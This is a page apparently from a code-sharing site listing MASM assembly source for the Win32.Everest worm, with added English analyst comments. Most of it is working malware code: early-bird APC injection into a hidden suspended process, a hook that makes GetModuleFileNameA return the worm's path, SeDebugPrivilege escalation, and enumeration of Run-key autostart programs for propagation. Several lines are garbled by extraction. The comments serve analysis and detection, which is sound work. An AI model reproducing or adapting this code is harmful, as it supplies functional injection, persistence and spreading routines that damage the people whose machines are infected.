
📄 virus.c

📁 一个病毒源代码（Win32.Everest 蠕虫，MASM 32 位 x86 汇编），通过劫持其他程序的 GetModuleFileNameA 借助其他病毒/自启动程序传播
💻 Assembly (MASM, 32-bit x86 / Win32) — the listing is assembly, not C, despite the file name
📖 第 1 页 / 共 2 页
;-----------------------------------------------------------------
; StartVirus(szVirusPath)          MASM, 32-bit x86, stdcall, Win32 API
;
; Analysis note (reviewer): this listing is part of a Win32 worm (the
; Signature string near the end of the file names it "Win32.Everest").
; The comments describe what the code does so analysts and detection
; engineers can read it; no instruction has been altered.
;
; Starts the program named by szVirusPath hidden and suspended, copies the
; position-independent stub RemoteCodeStart..RemoteCodeEnd into the new
; process, queues the stub as a user-mode APC on the process's initial
; thread and resumes it.  CreateProcess(CREATE_SUSPENDED) ->
; VirtualAllocEx -> WriteProcessMemory -> QueueUserAPC -> ResumeThread is
; the sequence usually called "early bird" APC injection (ATT&CK T1055.004).
;
; In:   szVirusPath - pointer to the NUL-terminated command line handed to
;                     CreateProcess as lpCommandLine
; Out:  nothing. pushad/popad restore every register on every exit path.
;       A failing API call silently abandons the attempt.
; Relies on: the patch sites inside the stub (_GetModuleFileNameA,
;       _VirtualProtect, _WriteProcessMemory) having already been filled by
;       GetAPIz - nothing here checks that.
; NOTE(review): several lines lost the blank between mnemonic and operand
;       during extraction ("jzSVExit", "pushPAGE_EXECUTE_READWRITE", "push0",
;       ...); read them as "jz SVExit", "push PAGE_EXECUTE_READWRITE", "push 0".
; NOTE(review): "PROCESS_INformATION" is a case-mangled PROCESS_INFORMATION;
;       the same mangling of "Value" -> "value" appears later in the listing.
;-----------------------------------------------------------------
StartVirus      PROC      szVirusPath : DWORD        
       LOCAL   sio       : STARTUPINFO             ; startup info for CreateProcess
LOCAL   pi        : PROCESS_INformATION            ; receives hProcess / hThread of the child
LOCAL   cbWritten : DWORD                          ; bytes written by WriteProcessMemory (never inspected)

       pushad                                      ; save all GPRs; restored by popad at SVExit
  push    sizeof(STARTUPINFO)                      ; RtlZeroMemory(&sio, sizeof STARTUPINFO)
       lea     eax , sio
       push    eax
       call    RtlZeroMemory
  mov     sio.cb , sizeof STARTUPINFO
  mov     sio.wShowWindow , SW_HIDE                ; child's window hidden ...
       mov     sio.dwFlags , STARTF_USESHOWWINDOW   ; ... and wShowWindow made effective
                     
       lea     eax , pi
       push    eax                                 ; lpProcessInformation
       lea     eax , sio
       push    eax                                 ; lpStartupInfo
       push    NULL                                ; lpCurrentDirectory
       push    NULL                                ; lpEnvironment
       push    CREATE_SUSPENDED                    ; dwCreationFlags: initial thread starts suspended
       push    TRUE                                ; bInheritHandles
       push    NULL                                ; lpThreadAttributes
       push    NULL                                ; lpProcessAttributes
       push    szVirusPath                         ; lpCommandLine
       push    NULL                                ; lpApplicationName
       call    CreateProcess
       or      eax , eax
 jzSVExit                                          ; (jz SVExit) creation failed: no handles to close

       push    3000
       call    Sleep                               ; 3 s pause; the child is still suspended, reason not evident
       
       pushPAGE_EXECUTE_READWRITE                  ; flProtect: RWX so the stub can run AND patch itself
pushMEM_RESERVE or MEM_COMMIT                      ; flAllocationType
pushRemoteCodeEnd - RemoteCodeStart                ; dwSize  = length of the stub
push0                                              ; lpAddress = NULL (let the kernel choose)
push    pi.hProcess                                ; hProcess = the suspended child
call    VirtualAllocEx 
or      eax , eax
jzSVFail                                           ; (jz SVFail) no remote memory: close handles and leave
mov     esi , eax                                  ; esi = base of the stub inside the child

add     eax , NewGetModuleFileName - RemoteCodeStart ; eax = remote address of NewGetModuleFileName
mov     _NewGetModuleFileNameA , eax               ; patch the LOCAL template of the stub (the imm32 of
                                                   ; the "push 12345678h" trampoline) before it is copied;
                                                   ; this is a store into the code stream, so the section
                                                   ; holding the stub must be writable (flags not in view)
      
       lea     eax , cbWritten
       push    eax                                 ; lpNumberOfBytesWritten
       push    RemoteCodeEnd - RemoteCodeStart     ; nSize
       push    offset  RemoteCodeStart             ; lpBuffer = the patched template
       push    esi                                 ; lpBaseAddress = remote stub base
       push    pi.hProcess
       call    WriteProcessMemory 
       or      eax , eax
jzSVFail                                           ; (jz SVFail)

       push    NULL                                ; dwData passed to the APC routine (unused by the stub)
       push    pi.hThread                          ; hThread = child's initial (suspended) thread
       push    esi                                 ; pfnAPC  = RemoteCodeStart in the child
       call    QueueUserAPC                        ; delivered when the thread first becomes alertable
       or      eax , eax
jzSVFail                                           ; (jz SVFail) APC not queued: child stays suspended, handles closed

       push    pi.hThread
       call    ResumeThread                        ; child runs; the APC fires before/at its first alertable wait
SVFail:
       push    pi.hThread
       call    CloseHandle
       push    pi.hProcess
       call    CloseHandle
SVExit:           
       popad
       ret     4                                   ; stdcall: one DWORD argument
StartVirus      ENDP

;-----------------------------------------------------------------
;-----------------------------------------------------------------
; RemoteCodeStart .. RemoteCodeEnd - the injected stub.
;
; StartVirus copies these bytes into the target process and queues
; RemoteCodeStart as a user-mode APC routine (one DWORD parameter, stdcall).
; Everything in here therefore runs at a foreign address and must be
; position independent; the absolute addresses it needs are imm32 "patch
; sites" named with "= dword ptr $-4" (the symbol aliases the immediate of
; the instruction just emitted) and are filled in by GetAPIz / StartVirus
; in the parent BEFORE the copy.  The stored addresses are the parent's;
; using them in the child assumes kernel32 is mapped at the same base there
; (true on pre-ASLR Windows - not checked).
;
; What the stub does in the child:
;   1. VirtualProtect the first 6 bytes of kernel32!GetModuleFileNameA RWX.
;   2. WriteProcessMemory(self) the 6-byte trampoline "push <addr>; ret"
;      (the bytes at the "push 12345678h / ret" below) over those 6 bytes,
;      where <addr> is NewGetModuleFileName inside this stub.
;   3. Return from the APC.  From then on every call to GetModuleFileNameA
;      in the child lands in NewGetModuleFileName, which hands back the
;      path stored in szWormPath instead of the caller's real module path.
; Presumably (not provable from this excerpt) the intent is that a hijacked
; autorun program / other malware which copies or re-registers "itself"
; ends up propagating this worm instead - matching the page description.
;
; "@pushsz" is a macro not shown in this excerpt; from its use it pushes
; the address of an inline NUL-terminated string.  The two "'123'" pushes
; are scratch output DWORDs (3 chars + NUL = 4 bytes) for lpflOldProtect /
; lpNumberOfBytesWritten; they live inside the stub's own RWX buffer.
;-----------------------------------------------------------------
RemoteCodeStart:       
       mov      esi , 12345678h                   ; esi = address of kernel32!GetModuleFileNameA (patched)
_GetModuleFileNameA   = dword ptr $-4             ; patch site: the imm32 above; written by GetAPIz
       
       @pushsz  '123'          ;cbWriten          ; lpflOldProtect -> 4 scratch bytes in the stub
       push     PAGE_EXECUTE_READWRITE            ; flNewProtect
       push     6                       ; push & ret ; dwSize: "push imm32" (5 bytes) + "ret" (1 byte)
       push     esi                               ; lpAddress = GetModuleFileNameA
       mov      eax , 12345678h                   ; eax = kernel32!VirtualProtect (patched)
_VirtualProtect  = dword ptr $-4                  ; patch site; written by GetAPIz
       call     eax                               ; VirtualProtect(GetModuleFileNameA, 6, RWX, scratch)
     
       @pushsz  '123'         ;cbWriten           ; lpNumberOfBytesWritten -> scratch
       push     6                                 ; nSize = 6 bytes
       call     RCSJump                           ; pushes the address of the trampoline bytes below;
                                                  ; that "return address" becomes lpBuffer and is never
                                                  ; returned to (see ret 4 in RCSJump)
       push     12345678h                         ; DATA, not executed here: 68 <imm32> = "push NewGetModuleFileName"
_NewGetModuleFileNameA = dword ptr $-4            ; patch site: remote address of NewGetModuleFileName,
                                                  ; written by StartVirus into the template before copying
       ret                                        ; DATA: C3 - completes the 6-byte "push addr; ret" trampoline
RCSJump:
       push     esi                               ; lpBaseAddress = GetModuleFileNameA
       push     -1                                ; hProcess = -1 (current-process pseudo-handle)
       mov      eax , 12345678h                   ; eax = kernel32!WriteProcessMemory (patched)
_WriteProcessMemory = dword ptr $-4               ; patch site; written by GetAPIz
       call     eax                               ; WriteProcessMemory(-1, GetModuleFileNameA, trampoline, 6, scratch)
                                                  ; its stdcall "ret 14h" also removes the RCSJump return address
       ret      4                                 ; stack is now the APC dispatcher's frame: return from the
                                                  ; APC routine and discard its single DWORD parameter

NewGetModuleFileName:
; Replacement for GetModuleFileNameA(hModule, lpFilename, nSize) - stdcall, 3 args.
; Copies the NUL-terminated string embedded at szWormPath into lpFilename and
; returns its length (excluding the NUL).  hModule and nSize are IGNORED: the copy
; runs to the NUL regardless of the caller's buffer size.  Only the ANSI entry is
; hooked; GetModuleFileNameW is untouched.  szWormPath is all zeros here - whatever
; fills it with the worm's path must run before StartVirus copies the stub (not in view).
       push     esi
       push     edi
       mov      edi , [esp+16]                    ; [esp+16] = lpFilename (2 saved regs + retaddr + hModule)
       call     _szWormPath                       ; call-over-data: pushes &szWormPath, jumps past the buffer
szWormPath       db    MAX_PATH dup (0)           ; path to be reported to hooked callers (filled elsewhere)
_szWormPath:        
       pop      esi                               ; esi = &szWormPath (position independent)
       xor      ecx , ecx                         ; ecx = bytes copied, NUL included
RCSLoop:
       lodsb
       stosb
       inc      ecx        
       or       al , al
       jnz      RCSLoop                           ; copy through the terminating NUL
       pop      edi
       pop      esi
       mov      eax , ecx
       dec      eax                               ; return value = strlen(szWormPath)
       ret      12                                ; stdcall: 3 DWORD args
RemoteCodeEnd:       

;-----------------------------------------------------------------
;-----------------------------------------------------------------
; GetAPIz - resolve the APIs the stub and the rest of the worm need at
; run time and store them into the stub's patch sites / global slots.
;
; Resolves from Kernel32.dll (already loaded):
;   GetModuleFileNameA, VirtualProtect, WriteProcessMemory -> patch sites
;   inside RemoteCodeStart (the imm32 of the stub's mov instructions).
; Loads PSAPI (LoadLibraryA "PSAPI", i.e. PSAPI.DLL) and resolves:
;   EnumProcesses, EnumProcessModules, GetModuleFileNameExA -> _EnumProcesses,
;   _EnumProcessModules, _GetModuleFileNameEx (defined outside this excerpt;
;   their users are not in view either).
;
; Not a PROC: plain label, called with "call GetAPIz", no pushad.
; Clobbers esi (module handle), eax, plus whatever the stdcall callees
; clobber (ecx/edx).  No return value is checked: a failed GetModuleHandle,
; LoadLibraryA or GetProcAddress leaves a NULL stored at the corresponding
; site, and the stub would later "call eax" / "mov esi" through it.
; Storing into the patch sites writes into the code stream - requires the
; stub's section to be writable (section flags not in view).
;-----------------------------------------------------------------
GetAPIz:
       @pushsz   'Kernel32.dll'
       call      GetModuleHandle
       xchg      eax,esi                          ; esi = hKernel32 (NULL if not found - unchecked)
       
       @pushsz   'GetModuleFileNameA'             ; lpProcName
       push      esi                              ; hModule
       call      GetProcAddress
       mov       _GetModuleFileNameA,eax          ; -> stub patch site (address of the function to hook)
       
       @pushsz   'VirtualProtect'
       push      esi
       call      GetProcAddress
       mov       _VirtualProtect,eax              ; -> stub patch site
       
       @pushsz   'WriteProcessMemory'
       push      esi
       call      GetProcAddress
       mov       _WriteProcessMemory,eax          ; -> stub patch site

       @pushsz    'PSAPI'
       call       LoadLibraryA                    ; PSAPI.DLL; process/module enumeration helpers
       xchg       eax,esi                         ; esi = hPsapi (NULL on failure - unchecked)

       @pushsz    'EnumProcesses'
       push       esi
       call       GetProcAddress
       mov        _EnumProcesses,eax              ; slot defined elsewhere in the file             
                
       @pushsz    'EnumProcessModules'
       push       esi
       call       GetProcAddress
       mov        _EnumProcessModules,eax         ; slot defined elsewhere in the file                   

       @pushsz    'GetModuleFileNameExA'
       push       esi
       call       GetProcAddress
       mov        _GetModuleFileNameEx,eax        ; slot defined elsewhere in the file                   
       ret        
       
;---------------Raise Privilege of our process----------------------
;-----------------------------------------------------------------
; RaisePrivileges - enable SeDebugPrivilege in the current process token.
;
; OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &p_token)
;   -> LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &p_luid)
;   -> AdjustTokenPrivileges(p_token, FALSE, &token_priv, NULL, NULL, NULL)
; With SeDebugPrivilege enabled the process can open other processes
; regardless of their DACL; presumably wanted for the EnumProcesses /
; GetModuleFileNameExA calls resolved in GetAPIz (their users not in view).
;
; Not a PROC: plain label, no pushad; clobbers eax (and ecx/edx via callees).
; Return value: none that callers can rely on - the result of
; AdjustTokenPrivileges is not examined here.  SetLastError(0) right before
; it suggests a caller looks at GetLastError afterwards (AdjustTokenPrivileges
; can succeed while setting ERROR_NOT_ALL_ASSIGNED); no such caller is in view.
; p_token is never closed in this excerpt.
; The DWORDs after "ret" are writable data placed in the code stream;
; LookupPrivilegeValueA writes p_luid there, so the section must be writable.
;-----------------------------------------------------------------
RaisePrivileges:
       call      GetCurrentProcess                ; eax = pseudo-handle of this process
       push      offset p_token                   ; TokenHandle out-param
       push      TOKEN_ALL_ACCESS       ;DesiredAccess
       push      eax                        
       call      OpenProcessToken       ;open token of our process    
       or        eax,eax                ;(author's note: "I used cmp eax,eax first")
       jz        RPExit                           ; could not open the token: give up silently

       push      offset p_luid                    ; lpLuid: filled with the privilege's LUID
       @pushsz   'SeDebugPrivilege'               ; lpName
       push      NULL                             ; lpSystemName: local machine
       call      LookupPrivilegevalueA  ;find LUID for this priv.   (case-mangled LookupPrivilegeValueA)
       dec       eax                              ; continue only if the BOOL result is exactly 1;
       jne      RPExit                            ; any other non-zero "TRUE" is treated as failure
   
       push      0
       call      SetLastError                     ; clear last error so a later GetLastError reflects AdjustTokenPrivileges
       push      NULL                             ; ReturnLength
       push      NULL                             ; PreviousState
       push      NULL                             ; BufferLength
       push      offset token_priv                ; NewState (TOKEN_PRIVILEGES laid out below)
       push      FALSE                            ; DisableAllPrivileges
       push      p_token                          ; TokenHandle
       call      AdjustTokenPrivileges            ; result ignored
RPExit:    
       ret
       token_priv   dd    1                       ; TOKEN_PRIVILEGES.PrivilegeCount = 1
       p_luid       db    8 dup(0)                ;   Privileges[0].Luid  (filled by LookupPrivilegeValueA)
                    dd    SE_PRIVILEGE_ENABLED    ;   Privileges[0].Attributes
       p_token      dd    0                       ; handle from OpenProcessToken (never closed here)

;-------------------------------------------------------------------   
;-------------------------------------------------------------------
; ReadRunKey - enumerate HKLM\Software\Microsoft\Windows\CurrentVersion\Run
; and write the full path of every autorun entry into the buffer at pMem
; as a sequence of NUL-terminated strings, ended by an empty string
; (an extra NUL).  The Run key is the classic login-persistence location
; (ATT&CK T1547.001); presumably the list is what StartVirus is later fed,
; but the consumer of pMem is not in this excerpt.
;
; Per value (data read into szFilePath, type NOT checked - REG_EXPAND_SZ
; and binary data are treated as a string, and the data is assumed to be
; NUL-terminated within MAX_PATH bytes):
;   - data contains a '\'  -> ReplaceFilePath expands a leading %system% /
;                             %windir% (the worm's own placeholders, not the
;                             system's), then the string is appended as is;
;   - data contains no '\' -> TWO candidates are appended:
;                             "<szWinPath>\<data>" and "<szSysPath>\<data>".
; In:   nothing (globals pMem, szWinPath, szSysPath).
; Out:  list written through pMem; all registers restored by popad, so the
;       end pointer is not returned - callers must scan for the double NUL.
; Hazards visible in the code:
;   * the capacity of the pMem buffer is never checked (allocation not in view);
;   * if RegOpenKeyEx fails the jump to RRKExit executes "stosb" before edi
;     has been loaded from pMem, i.e. it writes one NUL byte through the
;     CALLER's edi;
;   * for empty value data "repnz scasb" runs zero iterations and the
;     "jz RRRKReplace" then tests whatever flags lstrlen left behind.
; NOTE(review): KEY_QUERY_value / RegEnumvalue / szvalueName / dwvalueLen are
;     case-mangled ("Value") by extraction.
;-------------------------------------------------------------------
ReadRunKey    PROC
       LOCAL    hKey                   : DWORD    ; opened Run key
       LOCAL    dwIndex                : DWORD    ; RegEnumValue index
       LOCAL    szFilePath[MAX_PATH]   : BYTE     ; value data (the command line / path)
       LOCAL    szvalueName[MAX_PATH]  : BYTE     ; value name (never used after the call)
       LOCAL    dwvalueLen             : DWORD    ; in/out size of szvalueName
       LOCAL    dwDataLen              : DWORD    ; in/out size of szFilePath
       LOCAL    dwType                 : DWORD    ; value type (stored, never examined)
       
       pushad                       
       lea      eax , hKey
push     eax                                      ; phkResult
push     KEY_QUERY_value            ;KEY_ALL_ACCESS   ; samDesired = KEY_QUERY_VALUE
push     0                                        ; ulOptions
       @pushsz  'Software\Microsoft\Windows\CurrentVersion\Run'       
push     HKEY_LOCAL_MACHINE
call     RegOpenKeyEx
cmp      eax , ERROR_SUCCESS
jnz      RRKExit                                  ; NB: RRKExit stores a NUL through edi, which is still the caller's

push     0
pop      dwIndex                                  ; dwIndex = 0
push     pMem
pop      edi                                      ; edi = write cursor into the output buffer

RRKLoop:              
push     MAX_PATH
 pop      dwDataLen                               ; reset in/out sizes for every call
push     MAX_PATH
pop      dwvalueLen
       lea      eax , dwDataLen
       push     eax                               ; lpcbData
       lea      esi , szFilePath
       push     esi                               ; lpData (esi keeps pointing at the data below)
       lea      eax , dwType
       push     eax                               ; lpType
       push     NULL                              ; lpReserved
       lea      eax , dwvalueLen
       push     eax                               ; lpcchValueName
       lea      eax , szvalueName
       push     eax                               ; lpValueName
       push     dwIndex
       push     hKey
       call     RegEnumvalue                      ; RegEnumValue(hKey, dwIndex, ...)
       cmp      eax , ERROR_SUCCESS
       jnz      RRKClose                          ; ERROR_NO_MORE_ITEMS or any error ends the loop
            
       push     edi                               ; preserve the output cursor
       mov      edi , esi
       push     edi
       call     lstrlen                           ; ecx = strlen(data)
       mov      ecx , eax
       mov      al , '\'
       repnz    scasb                             ; look for a backslash in the data
       pop      edi
       jz       RRRKReplace                       ; found one: treat as a path
                              
       push     esi                               ; bare file name: build "<szWinPath>\<name>" at edi
       @pushsz  '\'      
       push     offset szWinPath
       @pushsz  '%s%s%s'
       push     edi
       call     wsprintf       
       add      esp , 20                          ; cdecl, 5 args
               
       push     edi
       call     lstrlen        
       add      edi , eax                         ; edi -> the NUL wsprintf wrote ...
       xor      al , al
       stosb                                      ; ... rewrite it and step past it: entry terminated
               
       push     esi                               ; second candidate: "<szSysPath>\<name>"
       @pushsz  '\'      
       push     offset szSysPath
       @pushsz  '%s%s%s'
       push     edi
       call     wsprintf       
       add      esp , 20                          ; cdecl, 5 args
       jmp      RRKNext                
       
RRRKReplace:        
       push     esi         
       call     ReplaceFilePath                   ; expand leading %system% / %windir% in place

       push     esi       
       push     edi
       call     lstrcpy                           ; lstrcpy(edi, szFilePath): append the path
RRKNext:                         
       push     edi
       call     lstrlen        
       add      edi , eax                         ; advance past the appended string
       xor      al , al
       stosb                                      ; terminate it and step past the NUL
       inc      dwIndex
       jmp      RRKLoop                
RRKClose:        

       push     hKey
       call     RegCloseKey 
RRKExit:                    
       xor      al , al
       stosb                                      ; empty string terminates the list (double NUL)
       popad               
       ret
ReadRunKey   ENDP

;------------------------------------------------------------------
;------------------------------------------------------------------
; ReplaceFilePath(szFilePath) - in-place expansion of a leading placeholder.
;
; If the string at szFilePath starts with the 8 bytes "%system%" it is
; rewritten as szSysPath + <rest of the string after the placeholder>;
; if it starts with "%windir%" it becomes szWinPath + <rest>.  Any other
; string is left untouched.  Both comparisons are byte-exact (repz cmpsb):
; "%SYSTEM%" or "%WinDir%" would not match.  These placeholders are the
; worm's own convention, not Windows environment variables.
;
; In:   szFilePath - pointer to a writable NUL-terminated string; the
;       caller in view passes a MAX_PATH-byte local.
; Out:  string modified in place; all registers restored by popad.
; The local copy s is what makes in-place replacement possible: the tail is
; read from s AFTER szFilePath has been overwritten with the directory.
; No length check: szSysPath/szWinPath (50-byte globals) plus the tail are
; written into the caller's buffer whose size is unknown here.
; Relies on edi surviving the lstrcpy call (callee-saved under the Win32
; x86 convention).
;------------------------------------------------------------------
ReplaceFilePath     PROC   szFilePath  : DWORD
       LOCAL       s[MAX_PATH] : BYTE             ; scratch copy of the input
       pushad      
       push     szFilePath
       lea      edi , s
       push     edi
       call     lstrcpy                           ; lstrcpy(s, szFilePath); edi still -> s afterwards
IsSysDir:                        
       push     8
       pop      ecx                               ; compare 8 bytes
       @pushsz  '%system%'   ;len=8
       pop      esi                               ; esi -> literal
       repz     cmpsb                             ; on a full match edi -> s+8 (the tail)
       jne      IsWinDir
               
       push     offset szSysPath
       push     szFilePath
       call     lstrcpy                           ; szFilePath = szSysPath
       jmp      RFPCat
IsWinDir:        
       push     8
       pop      ecx
       @pushsz  '%windir%'   ;len=8
       pop      esi
       lea      edi , s                           ; cmpsb advanced edi: restart at the beginning of s
       repz     cmpsb
       jne      RFPExit                           ; neither placeholder: leave the string as is
               
       push     offset szWinPath
       push     szFilePath
       call     lstrcpy                           ; szFilePath = szWinPath
RFPCat:        
       push     edi                               ; edi -> tail after the placeholder (inside s)
       push     szFilePath
       call     lstrcat                           ; szFilePath += tail (no size check)
RFPExit:     
       popad
       ret      4                                 ; stdcall: one DWORD argument
ReplaceFilePath         ENDP           

; Globals at the end of the worm body.
Signature     db   'Win32.Everest by PKXP/CVC, made in China.',0  ; self-identification string; a static
                                                                    ; detection artifact for this family
szWinPath     db    50  dup (0)    ; Windows directory, used by ReadRunKey/ReplaceFilePath. Only 50 bytes:
szSysPath     db    50  dup (0)    ; System directory. Whatever fills these (not in view) must cap at 50,
                                   ; which is less than MAX_PATH - a long install path would overflow
tmp           dd    ?              ; uninitialised scratch DWORD; not referenced in this excerpt
pMem          dd    0              ; pointer to the output buffer ReadRunKey fills; allocation not in view

VEnd:                              ; end-of-body marker (presumably used to size the worm; users not in view)
end main                           ; entry point "main" is defined outside this excerpt
  
 
